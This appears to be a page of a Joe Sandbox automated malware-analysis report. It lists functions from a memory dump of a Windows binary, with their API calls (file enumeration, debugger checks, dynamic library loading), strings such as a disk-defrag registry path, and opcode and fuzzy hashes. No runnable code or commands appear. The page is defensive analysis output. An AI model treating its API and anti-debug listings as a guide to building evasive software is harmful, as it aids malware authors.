                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3639550587-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction ID: f3d016862a4d3342d6fd7035e13c423cea38e9027ddeccfb2464269e0ea5178e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73015275644301AFE314CFA5DC89B6BB7E8FB88B05F80492CF54DC2290E774D9848B56
                                                                                                                                                                                                                                                                                    Function 004631F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 193fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                    • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                    • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                    • Opcode ID: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction ID: c3493345b0c0ceefe68b50463acd725d1f8c1e028979316797af0ed8e7acec35
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC71B5711083809FC720EF64C884A6BB7E5FB89314F444A6EF85997391E734EA45CB57
                                                                                                                                                                                                                                                                                    Function 004734E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                    Function 0041C260 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                    • SHFormatDateTimeW.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$DateFileFormatSystem
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                    • API String ID: 750415452-3598614746
                                                                                                                                                                                                                                                                                    • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                    • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                    Function 004150A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                    • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                    Function 004357EA Relevance: 5.5, Strings: 4, Instructions: 497COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                    • Opcode ID: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                    • Instruction ID: 4153cc9e9f9399db15846b8c3dde14c84802a132ab10d275a38415ff115d4298
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F81215B3C012155FF728CA24DD9AAEEBB79EB90304F0581BAE80D66284D77D5BC5CE41
                                                                                                                                                                                                                                                                                    Function 00438145 Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: ExitProcess$ExitProcess$G<2@
                                                                                                                                                                                                                                                                                    • API String ID: 0-4201739117
                                                                                                                                                                                                                                                                                    • Opcode ID: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                    • Instruction ID: c23cf397cf820b6e4d04b4d7928b2605fb7b39ed8a8d5c6d7e07ee262c8ce929
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD16CB1D052699BDB24CB14CD94BEAB7B1FF88300F1481EAE909A7341DA386EC1CF55
                                                                                                                                                                                                                                                                                    Function 00463750 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?,?,?,00462FCF,?), ref: 00463797
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
